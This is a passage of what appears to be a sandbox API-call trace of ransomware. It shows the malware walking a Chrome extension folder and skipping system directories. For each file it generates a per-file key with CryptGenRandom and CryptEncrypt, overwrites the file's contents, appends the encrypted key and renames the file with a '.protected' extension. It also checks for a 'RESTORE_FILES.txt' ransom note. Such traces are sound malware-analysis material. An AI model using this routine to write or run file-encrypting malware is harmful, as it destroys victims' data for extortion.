pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\..") returned 132 [0080.277] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.277] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.277] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0080.277] lstrcmpiW (lpString1="128.png", lpString2="Windows") returned -1 [0080.277] lstrcmpiW (lpString1="128.png", lpString2="Program Files") returned -1 [0080.277] lstrcmpiW (lpString1="128.png", lpString2="Program Files (x86)") returned -1 [0080.277] lstrcmpiW (lpString1="128.png", lpString2="$Recycle.bin") returned 1 [0080.277] lstrcmpiW (lpString1="128.png", lpString2="System Volume Information") returned -1 [0080.277] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png") returned 137 [0080.277] StrStrIW (lpFirst="128.png", lpSrch=".protected") returned 0x0 [0080.277] lstrcmpW (lpString1="128.png", lpString2="RESTORE_FILES.txt") returned -1 [0080.277] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0080.277] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0080.277] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0080.278] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png") returned 137 [0080.278] StrStrW (lpFirst="128.png", lpSrch=".txt") returned 0x0 [0080.278] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png") returned 137 [0080.278] StrStrW (lpFirst="128.png", lpSrch=".rar") returned 0x0 [0080.278] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png") returned 137 [0080.278] StrStrW (lpFirst="128.png", lpSrch=".zip") returned 0x0 [0080.278] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x1378, lpOverlapped=0x0) returned 1 [0080.279] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffec88, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.280] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1378, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x1378, lpOverlapped=0x0) returned 1 [0080.280] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.280] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0080.280] WriteFile (in: 
hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0080.280] CloseHandle (hObject=0x160) returned 1 [0080.281] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png.protected") returned 147 [0080.281] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png.protected")) returned 1 [0080.281] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0080.282] lstrcmpiW (lpString1="contentscript_bin_prod.js", lpString2="Windows") returned -1 [0080.282] lstrcmpiW (lpString1="contentscript_bin_prod.js", lpString2="Program Files") returned -1 [0080.282] lstrcmpiW (lpString1="contentscript_bin_prod.js", lpString2="Program Files (x86)") returned -1 [0080.282] lstrcmpiW (lpString1="contentscript_bin_prod.js", lpString2="$Recycle.bin") returned 1 [0080.282] lstrcmpiW (lpString1="contentscript_bin_prod.js", lpString2="System Volume Information") returned -1 [0080.282] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js") returned 155 [0080.282] StrStrIW (lpFirst="contentscript_bin_prod.js", lpSrch=".protected") returned 0x0 [0080.282] lstrcmpW (lpString1="contentscript_bin_prod.js", lpString2="RESTORE_FILES.txt") returned -1 [0080.282] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0080.282] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0080.282] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0080.283] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js") returned 155 [0080.283] StrStrW (lpFirst="contentscript_bin_prod.js", lpSrch=".txt") returned 0x0 [0080.283] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js") returned 155 [0080.283] StrStrW (lpFirst="contentscript_bin_prod.js", lpSrch=".rar") returned 0x0 [0080.283] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js") returned 155 [0080.283] StrStrW (lpFirst="contentscript_bin_prod.js", lpSrch=".zip") returned 0x0 [0080.283] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x1103, lpOverlapped=0x0) returned 1 [0080.292] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffeefd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.292] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1103, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x1103, lpOverlapped=0x0) returned 1 [0080.292] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.292] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0080.293] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0080.293] CloseHandle (hObject=0x160) returned 1 [0080.293] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js.protected") returned 165 [0080.293] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js" 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js.protected")) returned 1 [0080.294] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0080.294] lstrcmpiW (lpString1="dasherSettingSchema.json", lpString2="Windows") returned -1 [0080.294] lstrcmpiW (lpString1="dasherSettingSchema.json", lpString2="Program Files") returned -1 [0080.294] lstrcmpiW (lpString1="dasherSettingSchema.json", lpString2="Program Files (x86)") returned -1 [0080.294] lstrcmpiW (lpString1="dasherSettingSchema.json", lpString2="$Recycle.bin") returned 1 [0080.294] lstrcmpiW (lpString1="dasherSettingSchema.json", lpString2="System Volume Information") returned -1 [0080.294] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dasherSettingSchema.json") returned 154 [0080.294] StrStrIW (lpFirst="dasherSettingSchema.json", lpSrch=".protected") returned 0x0 [0080.294] lstrcmpW (lpString1="dasherSettingSchema.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.294] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0080.294] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 
[0080.294] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dasherSettingSchema.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dashersettingschema.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0080.294] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dasherSettingSchema.json") returned 154 [0080.295] StrStrW (lpFirst="dasherSettingSchema.json", lpSrch=".txt") returned 0x0 [0080.295] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dasherSettingSchema.json") returned 154 [0080.295] StrStrW (lpFirst="dasherSettingSchema.json", lpSrch=".rar") returned 0x0 [0080.295] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dasherSettingSchema.json") returned 154 [0080.295] StrStrW (lpFirst="dasherSettingSchema.json", lpSrch=".zip") returned 0x0 [0080.295] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x356, lpOverlapped=0x0) returned 1 [0080.296] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xfffffcaa, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.296] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x356, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: 
lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x356, lpOverlapped=0x0) returned 1 [0080.297] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.297] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0080.297] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0080.297] CloseHandle (hObject=0x160) returned 1 [0080.297] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dasherSettingSchema.json.protected") returned 164 [0080.297] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dasherSettingSchema.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dashersettingschema.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dasherSettingSchema.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dashersettingschema.json.protected")) returned 1 [0080.298] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0080.298] lstrcmpiW 
(lpString1="eventpage_bin_prod.js", lpString2="Windows") returned -1 [0080.298] lstrcmpiW (lpString1="eventpage_bin_prod.js", lpString2="Program Files") returned -1 [0080.298] lstrcmpiW (lpString1="eventpage_bin_prod.js", lpString2="Program Files (x86)") returned -1 [0080.298] lstrcmpiW (lpString1="eventpage_bin_prod.js", lpString2="$Recycle.bin") returned 1 [0080.298] lstrcmpiW (lpString1="eventpage_bin_prod.js", lpString2="System Volume Information") returned -1 [0080.298] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js") returned 151 [0080.298] StrStrIW (lpFirst="eventpage_bin_prod.js", lpSrch=".protected") returned 0x0 [0080.298] lstrcmpW (lpString1="eventpage_bin_prod.js", lpString2="RESTORE_FILES.txt") returned -1 [0080.298] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0080.298] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0080.298] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0080.299] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js") returned 151 
[0080.299] StrStrW (lpFirst="eventpage_bin_prod.js", lpSrch=".txt") returned 0x0 [0080.299] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js") returned 151 [0080.299] StrStrW (lpFirst="eventpage_bin_prod.js", lpSrch=".rar") returned 0x0 [0080.299] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js") returned 151 [0080.299] StrStrW (lpFirst="eventpage_bin_prod.js", lpSrch=".zip") returned 0x0 [0080.299] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0080.301] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.301] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0080.301] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.301] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0080.302] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0080.302] CloseHandle (hObject=0x160) returned 1 [0080.302] wnsprintfW (in: 
pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js.protected") returned 161 [0080.302] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js.protected")) returned 1 [0080.303] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0080.303] lstrcmpiW (lpString1="manifest.json", lpString2="Windows") returned -1 [0080.303] lstrcmpiW (lpString1="manifest.json", lpString2="Program Files") returned -1 [0080.303] lstrcmpiW (lpString1="manifest.json", lpString2="Program Files (x86)") returned -1 [0080.303] lstrcmpiW (lpString1="manifest.json", lpString2="$Recycle.bin") returned 1 [0080.303] lstrcmpiW (lpString1="manifest.json", lpString2="System Volume Information") returned -1 [0080.303] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json") returned 143 [0080.303] StrStrIW (lpFirst="manifest.json", lpSrch=".protected") returned 0x0 [0080.303] lstrcmpW (lpString1="manifest.json", 
lpString2="RESTORE_FILES.txt") returned -1 [0080.303] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0080.303] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0080.303] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0080.304] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json") returned 143 [0080.304] StrStrW (lpFirst="manifest.json", lpSrch=".txt") returned 0x0 [0080.304] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json") returned 143 [0080.304] StrStrW (lpFirst="manifest.json", lpSrch=".rar") returned 0x0 [0080.304] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json") returned 143 [0080.304] StrStrW (lpFirst="manifest.json", lpSrch=".zip") returned 0x0 [0080.304] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x5b1, lpOverlapped=0x0) returned 1 [0080.305] SetFilePointerEx (in: hFile=0x160, 
